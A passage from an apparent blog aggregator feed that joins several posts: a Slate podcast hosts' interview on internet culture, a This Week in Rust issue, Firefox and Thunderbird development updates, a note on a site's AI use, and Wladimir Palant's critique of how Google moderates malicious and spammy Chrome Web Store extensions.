Kate: The spelling of “grey” vs. “gray” because I always forget and just have to Google it again. I still don’t know right now.

Candice: Drew Starkey fancams.

What can you not stop talking about on the internet right now?

Kate: How it’s making us lonely! The internet should be for news, seeing what my high school classmates look like now, and fandoms. It should not be a single replacement for working, shopping, socializing and ever needing to leave the house.

Candice: Same as Kate. Maybe we’ll even make an ICYMI episode about it soon 🙂

What was the first online community you engaged with?

Kate: Mugglenet and FanFiction.net, for the same reason: to see if Harry and Hermione ever kiss.

Candice: I would say MileyWorld.com, which was a Miley Cyrus fan site that I was obsessed with. It had this MySpace feel to it, where “Miley” would leave messages, videos, and notes for her fans to comment on. There was a paid subscription element to the site, which I feel like is a bit gatekeep-y, especially when it’s catered to 12-year-olds. But the reason I stopped going on there is because I was catfished by someone who claimed to be Mandy Jiroux, Miley’s best friend whom you may know from the iconic program, The Miley and Mandy Show. “Mandy” and I were in the DMs, and on the front page of MileyWorld, they would spotlight one fan every day, and it was a big deal. It was like Reddit Karma points. And I had such a nice conversation with “Mandy” that she promised she would make me the spotlighted fan on the homepage the next day. I was so excited and bragged about it at school. But I forgot that I had a basketball game the day of my alleged crowning, so I went straight from school to the game, and I came home and conked out. And to this day, I will never, ever know if I was really MileyWorld’s fan of the day.

If you could create your own corner of the internet, what would it look like?

Kate: MySpace plus the ability to post videos, minus the requirement to publicly rank your friends.

Candice: It would combine: KindleTok, hopecore, Bella Hadid’s aesthetic and those TikTok tarot readings where they don’t have any hashtags or captions on the posts so you totally know that video was meant for you.

What articles and/or videos are you waiting to read/watch right now?

Kate: I’d love to open up YouTube and see that one of my various English mums has posted a 40-minute long vlog of them cleaning their house and running errands. I just checked and one has 🙂

Candice: I really love Wishbone Kitchen’s content. Her TikToks have leaned away from “day in the life of a private chef in the Hamptons” and toward her daily cooking rituals as someone who just bought a house in the Hamptons. And usually, when an influencer buys a home, they get hate (envy) for it, but I am really happy for Meredith because she showed the work that it took to get there, and her content doesn’t strike me as braggy. Instead, she nurtures her garden, she takes her dogs on a walk, she microplanes local cheeses, and it’s very Cotswoldsian to me. She feels like American Taggie from Rivals. I’ve been saving her 45-minute Christmas and Thanksgiving dinner videos for those cozy nights in when you’re cooking a big bolognese and you want something light and bright that encourages you to be patient while cooking. I like her videos because audio-wise, there’s something really satisfying about hearing the garlic sizzle and short rib sear, and her videos make everything seem doable.

What’s your wildest internet culture prediction for 2025?

Kate: Digital wellness as the new self-care — mindful consumption, logging off, physical media (and then posting about it all online, of course).

Candice: I think a big celebrity or influencer will sue @PopCrave for forgetting to say they “stunned” in a photo.


Kate Lindsay is a writer from Brooklyn, New York and author of the internet culture newsletter Embedded. Her work has also appeared in The New York Times, The Atlantic, Bustle, and GQ, launching viral phenomena like the millennial pause and “rawdogging” flights. Previously, she was a newsletter editor at The Atlantic and a staff writer at Refinery29.

Candice Lim is the co-host of ICYMI, Slate’s podcast about internet culture. She comes to Slate from NPR, where she was an assistant producer at Pop Culture Happy Hour. Prior to that, she was an intern at NPR’s How I Built This, the Hollywood Reporter, WBUR and the Orange County Register. She graduated from Boston University with a bachelor’s degree in journalism and grew up in Orange County, California.

The post Slate’s ICYMI hosts on their online obsessions and wildest 2025 predictions  appeared first on The Mozilla Blog.

This Week In RustThis Week in Rust 582

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Foundation
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is vidyut, a Sanskrit toolkit containing functionality about meter, segmentation, inflections, etc.

Thanks to Arun Prasad for the self-suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.


Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

  • Rust Week (Rust NL) | Closes on 2025-01-19 | Utrecht, NL | Event on 2025-05-13 & 2025-05-14
  • Rust Summit | Rolling deadline | Belgrade, RS | Event on 2025-06-07

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

469 pull requests were merged in the last week

Rust Compiler Performance Triage

A quiet week with little change to the actual compiler performance. The biggest compiler regression was quickly recognized and reverted.

Triage done by @rylev. Revision range: 0f1e965f..1ab85fbd

Summary:

(instructions:u)              mean     range              count
Regressions ❌ (primary)      0.4%     [0.1%, 1.8%]       21
Regressions ❌ (secondary)    0.5%     [0.0%, 2.0%]       35
Improvements ✅ (primary)     -0.8%    [-2.7%, -0.3%]     6
Improvements ✅ (secondary)   -10.2%   [-27.8%, -0.1%]    13
All ❌✅ (primary)            0.2%     [-2.7%, 1.8%]      27

4 Regressions, 3 Improvements, 3 Mixed; 3 of them in rollups. 44 artifact comparisons made in total.

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

  • No RFCs were approved this week.
Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
Rust
Cargo
  • No Cargo Tracking Issues or PRs entered Final Comment Period this week.
Language Team
  • No Language Team Proposals entered Final Comment Period this week.
Language Reference
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2025-01-15 - 2025-02-12 🦀

Virtual
Europe
North America
Oceania

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

This is a wonderful unsoundness and I am incredibly excited about it :3

lcnr on github

Thanks to Christoph Grenz for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, U007D, joelmarcey, mariannegoldin, bennyvasquez, bdillo

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

Don MartiHow this site uses AI

This site is written by me personally except for anything that is clearly marked up and cited as a direct quotation. If you see anything on here that is not cited appropriately, please contact me.

Generative AI output appears on this site only if I think it really helps make a point and only if I believe that my use of a similar amount and kind of material from a relevant work in the training set would be fair use.

For example, I quote a sentence of generative AI output in LLMs and reputation management. I believe that I would have been within my fair use rights to use the same amount of text from a copyrighted history book or article.

In LLMs and the web advertising business, my point was not only that the Big Tech companies are crooked, but that it’s so obvious. A widely available LLM can easily point out that a site running Big Tech ads—for real brands—is full of ripped-off content. So I did include a short question and answer session with ChatGPT. It’s really getting old that big companies are constantly being shocked to discover infringement and other crimes when their own technology could have spotted it.

Usually when I mention AI or LLMs on here I don’t include any generated content.

More slash pages

Related

notes on ad-supported piracy LLM-generated sites are a refinement of an existing business model by infringing sites and their Big Tech enablers.

use a Large Language Model, or eat Tide Pods? Make up your own mind, I guess.

AI legal links

personal AI in the rugpull economy The big opportunity for personal AI could be in making your experiences less personalized.

Block AI training on a web site (Watch this space. More options and a possible standard could be coming in 2025.)

Money bots talk and bullshit bots walk?, boring bots ftw, How we get to the end of prediction market winter (AI and prediction markets complement each other—prediction markets need noise and arbitrage, AI needs a scalable way to measure quality of output.)

Firefox NightlyKey Improvements – These Weeks in Firefox: Issue 174

Highlights

  • Nicolas Chevobbe [:nchevobbe] added $$$, a console helper that retrieves elements from the document, including those in the Shadow DOM (#1899558; see the console sketch after this list)
  • Thanks to John Diamond for contributing changes to allow users to assign custom keyboard shortcuts for WebExtensions using the F13-F19 extended function keys
    • You can find this menu in about:addons by clicking the cog icon and choosing “Manage Extension Shortcuts”

    • NOTE: F13-F19 function keys are still going to be invalid if specified in the default shortcuts set in the extension manifest
  • We’re going to launch the “Sections” feed experiment in New Tab soon. This experiment changes how stories are laid out (new modular layouts instead of the same medium cards, with some sections organized into categories)
    • Try it out yourself in Nightly by setting the following to TRUE
      • browser.newtabpage.activity-stream.discoverystream.sections.enabled
      • browser.newtabpage.activity-stream.discoverystream.sections.cards.enabled
  • Dale implemented searching Tab Groups by name in the Address Bar and showing them as Actions – Bug 1935195
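
As a quick illustration of the $$$ helper highlighted above, here is a sketch of console usage ($$$ behaves like $$, but also matches elements inside shadow roots):

// In the DevTools console:
$$("input")   // matches elements in the light DOM only
$$$("input")  // also includes <input> elements inside open shadow roots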

Friends of the Firefox team

Resolved bugs (excluding employees)

Volunteers that fixed more than one bug

  • Abhijeet Chawla[:ff2400t]
  • Meera Murthy

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

Addon Manager & about:addons
  • Thanks to Matt Mower for contributing CSS cleanup and modernization changes to the “Manage Extensions Shortcuts” section of about:addons – Bug 1921634
WebExtensions Framework
  • A warning message bar will be shown in the Extensions panel under the soft-blocked extensions that have been re-enabled by the user – Bug 1925291
WebExtension APIs
  • Native messaging support for snap-packaged Firefox has now been merged into mozilla-central – Bug 1661935
    • NOTE: Bug 1936114 tracks fixing an AttributeError hit by mach xpcshell-test as a side effect of the changes applied by Bug 1661935; until the fix lands, mach test is a short-term workaround for running xpcshell tests locally

DevTools

DevTools Toolbox
WebDriver BiDi
  • External:
    • Dan (temidayoazeez032) implemented the browser.getClientWindows command which allows clients to retrieve a list of information about the current browser windows. (#1855025)
    • Spencer (speneth1) removed a duplicated get windows helper which used to be implemented in two different classes. (#1925985)
    • Patrick (peshannon104) added a log to help investigate network events for which WebDriver BiDi didn’t manage to retrieve all the response information. (#1930848)
  • Updates:
    • Sasha improved support for installing extensions with Marionette and geckodriver. Geckodriver was updated to push the add-on file to the device using base64, which made it possible to install extensions on GeckoView. (#1806135)
    • Still on the topic of add-ons, Sasha also added a flag to install add-ons allowed to run in Private Browsing mode. (#1926311)
    • Julian added two new fields in BiDi network events: initiatorType and destination, coming from the fetch specification. The previous initiator.type field had no clear definition and is now deprecated. This supports the transition of Cypress from CDP to WebDriver BiDi. (#1904892)
    • Julian also fixed a small issue with those two new fields, which had unexpected values for top-level document loads. (#1933331)
    • After discussions during TPAC, we decided to stop emitting various events for the initial about:blank load. Sasha fixed a first gap on this topic: WebDriver BiDi will no longer emit browsingContext.navigationStarted events for such loads. (#1922014)
    • Henrik improved the stability of commands in Marionette in case the browsing context gets discarded (#1930530).
    • Henrik also did similar improvements for our WebDriver BiDi implementation, and fine-tuned our logic to retry commands sent to content processes (#1927073).
    • Julian reverted the message for UnexpectedAlertOpenError in Marionette to make sure we include the dialog’s text, as some clients seemed to rely on this behavior. (#1924469)
    • Thanks to :valentin who fixed an issue with nsITimedChannel.asyncOpenTime, which was sometimes unexpectedly set to 0 (#1931514). Prior to that, Julian had added a small workaround to fall back on nsITimedChannel.channelCreationTime, but we will soon revert it (#1930849).
    • Sasha updated the browsingContext.traverseHistory command to only accept top-level browsing contexts. (#1924859)

Lint, Docs and Workflow

New Tab Page

  • FakeSpot recommended gifts experiment ended last week
  • For this next release the team is working on:
    • Supporting experiments with more industry standard ad sizes (Leaderboard and billboard)
    • Iterating/continuing Sections feed experiment
    • AdsFeed tech debt (Consolidating new tab ads logic into one place)

Password Manager

Places

  • Marco removed the old bookmarks transaction manager (undo/redo) code, as a better version of it has been shipping for a few months – Bug 1870794
  • Marco has enabled for release in Firefox 135 a safeguard preventing origins from overwhelming history with multiple consecutive visits, the feature has been baking in Nightly for the last few months – Bug 1915404
  • Yazan fixed a regression with certain svg favicons being wrongly picked, and thus having a bad contrast in the UI (note it may take a few days for some icons to be expired and replaced on load) – Bug 1933158 

Search and Navigation

  • Address bar revamp (aka Scotch Bonnet project)
    • Moritz fixed a bug causing address bar results flicker due to switch to tab results – Bug 1901161
    • Yazan fixed a bug with Actions search mode wrongly persisting after picking certain actions – Bug 1919549
    • Dale added badged entries to the unified search button to install new OpenSearch engines – Bug 1916074
    • Dale fixed a problem with some installed OpenSearch engines not persisting after restart – Bug 1927951
    • Daisuke implemented dynamic hiding of the unified search button (a few additional changes incoming to avoid shifting the URL on focus) – Bug 1928132
    • Daisuke fixed a problem with Esc not closing the address bar dropdown when unified search button is focused – Bug 1933459
  • Suggest
  • Other relevant fixes
    • Contributor Anthony Mclamb fixed unexpected console error messages when typing just ‘@’ in the address bar – Bug 1922535

Storybook/Reusable Components

  • Anna Kulyk (welcome! Yes of moz-message-bar fame!) cleaned up some leftover code in moz-card Bug 1910631
  • Mark Kennedy updated the Heartbeat infobar to use the moz-five-star component, and updated the component to support selecting a rating Bug 1864719
  • Mark Kennedy updated the about:debugging page to use the new –page-main-content-width design token which had the added benefit of bringing our design tokens into the chrome://devtools/ package Bug 1931919
  • Tim added support for support links in moz-fieldset Bug 1917070 Storybook
  • Hanna updated our support links to be placed after the description, if one is present Bug 1928501 Storybook

Mozilla ThunderbirdThunderbird Monthly Development Digest – December 2024

Happy New Year Thunderbirders! With a productive December and a good rest now behind us, the team is ready for an amazing year. Since the last update, we’ve had some successes that have felt great. We also completed a retrospective on a major pain point from last year. This has been humbling and has provided an important opportunity for learning and improvement.

Exchange Web Services support in Rust

Prior to the team taking their winter break, a cascade of deliverables passed the patch review process and landed in Daily. A healthy cadence of task completion saw a number of features reach users and lift the team’s spirits:

  • Copy to EWS from other protocol
  • Folder create
  • Enhanced logging
  • Local Storage
  • Save & manipulate Draft
  • Folder delete
  • Fix Edit Draft

Keep track of feature delivery here.

Account Hub

The overhauled Account Hub passed phase 1 QA review! A smaller team is handling phase 2 enhancements now that the initial milestone is complete. Our current milestone includes tasks for density and font awareness, refactoring of state management, OAuth prompts and more, which you can follow via Meta bug & progress tracking.

Global Database & Conversation View

Progress on the global database project was significant in the tail end of 2024, with foundational components taking shape. The team has implemented a database for folder management, including support for adding, removing, and reordering folders, and code for syncing the database with folders on disk. Preliminary work on a messages table and live view system is underway, enabling efficient filtering and handling of messages in real time. We have developed a mock UI to test these features, along with early documentation. Next steps include transitioning legacy folder and message functionality to a new “magic box” system, designed to simplify future refactoring and ensure a smooth migration without a disruptive “Big Bang” release.

Encryption

The future of email encryption has been on our minds lately. We have planned and started work on bridging the gap between the various factions and approaches that aim to provide quantum-resistant encryption in a post-quantum world. To give ourselves the breathing room to strategize and bring stakeholders together, we’re looking to hire a hardening team member who is familiar with encryption and comfortable with lower-level languages like C. Stay tuned if this might be you!

In-App Notifications

With phase 1 of this project complete, we uplifted the feature to 134.0 Beta, and notifications were shared with a significant number of users on both beta and daily releases in December. Data collected via Glean telemetry uncovered a couple of minor issues that have been addressed. It also provided peace of mind that the targeting system works as expected. Phase 2 of the project is well underway, and we have already uplifted some features and merged them into 135.0 Beta. See the Meta Bug & progress tracking.

Folder & Message Corruption

In the aftermath of our focused team effort to correct corruption issues introduced during our 2023 refactoring and solve other long-standing problems, we spent some time in self-reflection to perform a post mortem on the processes, decisions and situations which led to data loss and frustrations for users. While we regret a good number of preventable mistakes, it is also helpful to understand things outside of our control which played a part in this user-facing problem. You can find the findings and action plan here. We welcome any productive recommendations to improve future development in the more complex and arcane parts of the code.

New Features Landing Soon

Several requested features and fixes have reached our Daily users and include…

As usual, if you want to see things as they land, and help us squash some early bugs, you can always check the pushlog and try running daily, which would be immensely helpful for catching things early.

See you next month after FOSDEM!

Toby Pilling

Senior Manager, Desktop Engineering

The post Thunderbird Monthly Development Digest – December 2024 appeared first on The Thunderbird Blog.

Wladimir PalantChrome Web Store is a mess

Let’s make one thing clear first: I’m not singling out Google’s handling of problematic and malicious browser extensions because it is worse than Microsoft’s for example. No, Microsoft is probably even worse but I never bothered finding out. That’s because Microsoft Edge doesn’t matter, its market share is too small. Google Chrome on the other hand is used by around 90% of the users world-wide, and one would expect Google to take their responsibility to protect its users very seriously, right? After all, browser extensions are one selling point of Google Chrome, so certainly Google would make sure they are safe?

Screenshot of the Chrome download page. A subtitle “Extend your experience” is visible with the text “From shopping and entertainment to productivity, find extensions to improve your experience in the Chrome Web Store.” Next to it a screenshot of the Chrome browser and some symbols on top of it representing various extensions.

Unfortunately, my experience reporting numerous malicious or otherwise problematic browser extensions speaks otherwise. Google appears to take the “least effort required” approach towards moderating Chrome Web Store. Their attempts to automate all things moderation do little to deter malicious actors, all while creating considerable issues for authors of legitimate add-ons. Even when reports reach Google’s human moderation team, the actions taken are inconsistent, and Google generally shies away from taking decisive actions against established businesses.

As a result, for a decade my recommendation for Chrome users has been to stay away from Chrome Web Store if possible. Whenever extensions are absolutely necessary, it should be known who is developing them, why, and how the development is being funded. Just installing some extension from Chrome Web Store, including those recommended by Google or “featured,” is very likely to result in your browsing data being sold or worse.

Google employees will certainly disagree with me. Sadly, much of it is organizational blindness. I am certain that you meant it well and that you did many innovative things to make it work. But looking at it from the outside, it’s the result that matters. And for the end users the result is a huge (and rather dangerous) mess.

Some recent examples

Five years ago I discovered that Avast browser extensions were spying on their users. Mozilla and Opera disabled the extension listings immediately after I reported it to them. Google on the other hand took two weeks where they supposedly discussed their policies internally. The result of that discussion was eventually their “no surprises” policy:

Building and maintaining user trust in the Chrome Web Store is paramount, which means we set a high bar for developer transparency. All functionalities of extensions should be clearly disclosed to the user, with no surprises. This means we will remove extensions which appear to deceive or mislead users, enable dishonest behavior, or utilize clickbaity functionality to artificially grow their distribution.

So when dishonest behavior from extensions is reported today, Google should act immediately and decisively, right? Let’s take a look at two examples that came up in the past few months.

In October I wrote about the refoorest extension deceiving its users. I could conclusively prove that Colibri Hero, the company behind refoorest, deceives their users about the number of trees they supposedly plant, enticing users to install with empty promises. In fact, there is a strong indication that the company never even donated for planting trees beyond a rather modest one-time donation.

Google got my report and dealt with it. What kind of action did they take? That’s a very good question that Google won’t answer. But refoorest is still available from Chrome Web Store, it is still “featured” and it still advertises the very same completely made-up numbers of trees they supposedly planted. Google even advertises the extension, listing it in the “Editors’ Picks extensions” collection, probably the reason why it gained some users since my report. So much for being honest. For comparison: refoorest used to be available from Firefox Add-ons as well but was already removed when I started my investigation. Opera removed the extension from their add-on store within hours of my report.

But maybe that issue wasn’t serious enough? After all, there is no harm done to users if the company is simply pocketing the money they claim to spend on a good cause. So also in October I wrote about the Karma extension spying on users. Users are not being notified about their browsing data being collected and sold, except for a note buried in their privacy policy. Certainly, that’s identical to the Avast case mentioned before and the extension needs to be taken down to protect users?

Screenshot of a query string parameters listing. The values listed include current_url (a Yahoo address with an email address in the query string), tab_id, user_id, distinct_id, local_time.

Again, Google got my report and dealt with it. And again I fail to see any result of their action. The Karma extension remains available on Chrome Web Store unchanged, it will still notify their server about every web page you visit (see screenshot above). The users still aren’t informed about this. Yet their Chrome Web Store page continues to claim “This developer declares that your data is not being sold to third parties, outside of the approved use cases,” a statement contradicted by their privacy policy. The extension appears to have lost its “Featured” badge at some point but now it is back.

Note: Of course Karma isn’t the only data broker that Google tolerates in Chrome Web Store. I published a guest article today by a researcher who didn’t want to disclose their identity, explaining their experience with BIScience Ltd., a company misleading millions of extension users to collect and sell their browsing data. This post also explains how Google’s “approved use cases” effectively allow pretty much any abuse of users’ data.

Mind you, neither refoorest nor Karma were alone but rather recruited or bought other browser extensions as well. These other browser extensions were turned outright malicious, with stealth functionality to perform affiliate fraud and/or collect users’ browsing history. Google’s reaction was very inconsistent here. While most extensions affiliated with Karma were removed from Chrome Web Store, the extension with the highest user numbers (and performing affiliate fraud without telling their users) was allowed to remain for some reason.

With refoorest, most affiliate extensions were removed or stopped using their Impact Hero SDK. Yet when I checked more than two months after my report, two extensions from my original list still appeared to include that hidden affiliate fraud functionality, and I found seven new ones that Google apparently didn’t notice.

The reporting process

Now you may be wondering: if I reported these issues, why do I have to guess what Google did in response to my reports? Actually, keeping me in the dark is Google’s official policy:

Screenshot of an email: Hello Developer, Thank you again for reporting these items. Our team is looking into the items  and will take action accordingly. Please refer to the  possible enforcement (hyperlinked) actions and note that we are unable to comment on the status of individual items. Thank you for your contributions to the extensions ecosystem. Sincerely, Chrome Web Store Developer Support

This is by the way the response I received in November after pointing out the inconsistent treatment of the extensions. A month later the state of affairs was still that some malicious extensions got removed while other extensions with identical functionality were available for users to install, and I have no idea why that is. I’ve heard before that Google employees aren’t allowed to discuss enforcement actions, and your guess is as good as mine as to whom this policy is supposed to protect.

Supposedly, the idea of not commenting on policy enforcement actions is hiding the internal decision making from bad actors, so that they don’t know how to game the process. If that’s the theory however, it isn’t working. In this particular case the bad actors got some feedback, be it through their extensions being removed or due to the adjustments demanded by Google. It’s only me, the reporter of these issues, who needs to be guessing.

But, and this is a positive development, I’ve received a confirmation that both these reports are being worked on. This is more than I usually get from Google which is: silence. And typically also no visible reaction either, at least until a report starts circulating in media publications forcing Google to act on it.

But let’s take a step back and ask ourselves: how does one report Chrome Web Store policy violations? Given how much Google emphasizes their policies, there should be an obvious way?

In fact, there is a support document on reporting issues. And when I started asking around, even Google employees would direct me to it.

If you find something in the Chrome Web Store that violates the Chrome Web Store Terms of Service, or trademark or copyright infringement, let us know.

Sounds good, right? Except that the first option says:

At the bottom left of the window, click Flag Issue.

Ok, that’s clearly the old Chrome Web Store. But we understand of course that they mean the “Flag concern” link which is nowhere near the bottom. And it gives us the following selection:

Screenshot of a web form offering a choice from the following options: Did not like the content, Not trustworthy, Not what I was looking for, Felt hostile, Content was disturbing, Felt suspicious

This doesn’t really seem like the place to report policy violations. Even “Felt suspicious” isn’t right for an issue you can prove. And, unsurprisingly, after choosing this option Google just responds with:

Your abuse report has been submitted successfully.

No way to provide any details. No asking for my contact details in case they have questions. No context whatsoever, merely “felt suspicious.” This is probably fed to some algorithm somewhere which might result in… what actually? Judging by malicious extensions where users have been vocally complaining, often for years: nothing whatsoever. This isn’t the way.

Well, there is another option listed in the document:

If you think an item in the Chrome Web Store violates a copyright or trademark, fill out this form.

Yes, Google seems to care about copyright and trademark violations, but a policy violation isn’t that. If we try the form nevertheless it gives us a promising selection:

Screenshot of a web form titled “Select the reason you wish to report content.” The available options are: Policy (Non-legal) Reasons to Report Content, Legal Reasons to Report Content

Finally! Yes, policy reasons are exactly what we are after, let’s click that. And there comes another choice:

Screenshot of a web form titled “Select the reason you wish to report content.” The only available option is: Child sexual abuse material

That’s really the only option offered. And I have questions. At the very least those are: in what jurisdiction is child sexual abuse material a non-legal reason to report content? And: since when is that the only policy that Chrome Web Store has?

We can go back and try “Legal Reasons to Report Content” of course but the options available are really legal issues: intellectual properties, court orders or violations of hate speech law. This is another dead end.

It took me a lot of asking around to learn that the real (and well-hidden) way to report Chrome Web Store policy violations is Chrome Web Store One Stop Support. I mean: I get it that Google must be getting lots of nonsense reports. And they probably want to limit that flood somehow. But making legitimate reports almost impossible can’t really be the way.

In 2019 Google launched the Developer Data Protection Reward Program (DDPRP) meant to address privacy violations in Chrome extensions. Its participation conditions were rather narrow for my taste; pretty much no issue would qualify for the program. But at least it was a reliable way to report issues which might even get forwarded internally. Unfortunately, Google discontinued this program in August 2024.

It’s not that I am very convinced of DDPRP’s performance. I’ve used that program twice. First time I reported Keepa’s data exfiltration. DDPRP paid me an award for the report but, from what I could tell, allowed the extension to continue unchanged. The second report was about the malicious PDF Toolbox extension. The report was deemed out of scope for the program but forwarded internally. The extension was then removed quickly, but that might have been due to the media coverage. The benefit of the program was really: it was a documented way of reaching a human being at Google that would look at a problematic extension.

Chrome Web Store and their spam issue

In theory, there should be no spam on Chrome Web Store. The policy is quite clear on that:

We don’t allow any developer, related developer accounts, or their affiliates to submit multiple extensions that provide duplicate experiences or functionality on the Chrome Web Store.

Unfortunately, this policy’s enforcement is lax at best. Back in June 2023 I wrote about a malicious cluster of Chrome extensions. I listed 108 extensions belonging to this cluster, pointing out their spamming in particular:

Well, 13 almost identical video downloaders, 9 almost identical volume boosters, 9 almost identical translation extensions, 5 almost identical screen recorders are definitely not providing value.

I’ve also documented the outright malicious extensions in this cluster, pointing out that other extensions are likely to turn malicious as well once they have sufficient users. And how did Google respond? The malicious extensions have been removed, yes. But other than that, 96 extensions from my original list remained active in January 2025, and there were of course more extensions that my original report didn’t list. For whatever reason, Google chose not to enforce their anti-spam policy against them.

And that’s merely one example. My most recent blog post documented 920 extensions using tricks to spam Chrome Web Store, most of them belonging to a few large extension clusters. As it turned out, Google was made aware of this particular trick a year before my blog post already. And again, for some reason Google chose not to act.

Can extension reviews be trusted?

So when you search for extensions in Chrome Web Store, many results will likely come from one of the spam clusters. But the choice to install a particular extension is typically based on reviews. Can at least these reviews be trusted? Concerning moderation of reviews Google says:

Google doesn’t verify the authenticity of reviews and ratings, but reviews that violate our terms of service will be removed.

And the important part in the terms of service is:

Your reviews should reflect the experience you’ve had with the content or service you’re reviewing. Do not post fake or inaccurate reviews, the same review multiple times, reviews for the same content from multiple accounts, reviews to mislead other users or manipulate the rating, or reviews on behalf of others. Do not misrepresent your identity or your affiliation to the content you’re reviewing.

Now you may be wondering how well these rules are being enforced. The obviously fake review on the Karma extension is still there, three months after being posted. Not that it matters, with their continuous stream of incoming five star reviews.

A month ago I reported an extension to Google that, despite having merely 10,000 users, received 19 five star reviews on a single day in September – and only a single (negative) review since then. I pointed out that it is a consistent pattern across all extensions of this account, e.g. another extension (merely 30 users) received 9 five star reviews on the same day. It really doesn’t get any more obvious than that. Yet all these reviews are still online.

Screenshot of seven reviews, all giving five stars and all from September 19, 2024. Top review is by Sophia Franklin saying “solved all my proxy switching issues. fast reliable and free.” Next review is by Robert Antony saying “very  user-friendly and efficient for managing proxy profiles.” The other reviews all continue along the same lines.

And it isn’t only fake reviews. The refoorest extension incentivizes reviews which violates Google’s anti-spam policy (emphasis mine):

Developers must not attempt to manipulate the placement of any extensions in the Chrome Web Store. This includes, but is not limited to, inflating product ratings, reviews, or install counts by illegitimate means, such as fraudulent or incentivized downloads, reviews and ratings.

It has been three months, and they are still allowed to continue. The extension gets a massive amount of overwhelmingly positive reviews, users get their fake trees, everybody is happy. Well, other than the people trying to make sense of these meaningless reviews.

With reviews being so easy to game, it looks like lots of extensions are doing it. Sometimes it shows as a clearly inflated review count, sometimes it’s the overwhelmingly positive or meaningless content. At this point, any user ratings with the average above 4 stars likely have been messed with.

The “featured” extensions

But at least the “Featured” badge is meaningful, right? It certainly sounds like somebody at Google reviewed the extension and considered it worthy of carrying the badge. At least Google’s announcement indeed suggests a manual review:

Chrome team members manually evaluate each extension before it receives the badge, paying special attention to the following:

  1. Adherence to Chrome Web Store’s best practices guidelines, including providing an enjoyable and intuitive experience, using the latest platform APIs and respecting the privacy of end-users.
  2. A store listing page that is clear and helpful for users, with quality images and a detailed description.

Yet looking through 920 spammy extensions I reported recently, most of them carry the “Featured” badge. Yes, even the endless copies of video downloaders, volume boosters, AI assistants, translators and such. If there is an actual manual review of these extensions as Google claims, it cannot really be thorough.

To provide a more tangible example, Chrome Web Store currently has the Blaze VPN, Safum VPN and Snap VPN extensions carrying the “Featured” badge. These extensions (along with Ishaan VPN, which has barely any users) belong to the PDF Toolbox cluster which produced malicious extensions in the past. A cursory code inspection reveals that all four are identical and in fact clones of Nucleus VPN, which was removed from Chrome Web Store in 2021. And they don’t even work: no connections succeed. The extension not working is something users of Nucleus VPN complained about already, a fact that the extension compensated for with fake reviews.

So it looks like the main criteria for awarding the “Featured” badge are the things which can be easily verified automatically: user count, Manifest V3, claims to respect privacy (not even the privacy policy, merely that the right checkbox was checked), a Chrome Web Store listing with all the necessary promotional images. Given how many such extensions are plainly broken, the requirements on user interface and general extension quality don’t seem to be too high. And providing unique functionality definitely isn’t on the list of criteria.

In other words: if you are a Chrome user, the “Featured” badge is completely meaningless. It is no guarantee that the extension isn’t malicious, not even an indication. In fact, authors of malicious extensions will invest some extra effort to get this badge. That’s because the website algorithm seems to weigh the badge considerably towards the extension’s ranking.

How did Google get into this mess?

Google Chrome first introduced browser extensions in 2011. At that point the dominant browser extensions ecosystem was Mozilla’s, having been around for 12 years already. Mozilla’s extensions suffered from a number of issues that Chrome developers noticed of course: essentially unrestricted privileges necessitated very thorough reviews before extensions could be published on Mozilla Add-ons website, due to high damage potential of the extensions (both intentional and unintentional). And since these reviews relied largely on volunteers, they often took a long time, with the publication delays being very frustrating to add-on developers.

Disclaimer: I was a reviewer on Mozilla Add-ons myself between 2015 and 2017.

Google Chrome was meant to address all these issues. It pioneered sandboxed extensions which allowed limiting extension privileges. And Chrome Web Store focused on automated reviews from the very start, relying on heuristics to detect problematic behavior in extensions, so that manual reviews would only be necessary occasionally and after the extension was already published. Eventually, market pressure forced Mozilla to adopt largely the same approaches.

Google’s over-reliance on automated tools caused issues from the very start, and it certainly didn’t get any better with the increased popularity of the browser. Mozilla accumulated a set of rules to make manual reviews possible, e.g. all code should be contained in the extension, so no downloading of extension code from web servers. Also, reviewers had to be provided with an unobfuscated and unminified version of the source code. Google didn’t consider any of this necessary for their automated review systems. So when automated review failed, manual review was often very hard or even impossible.

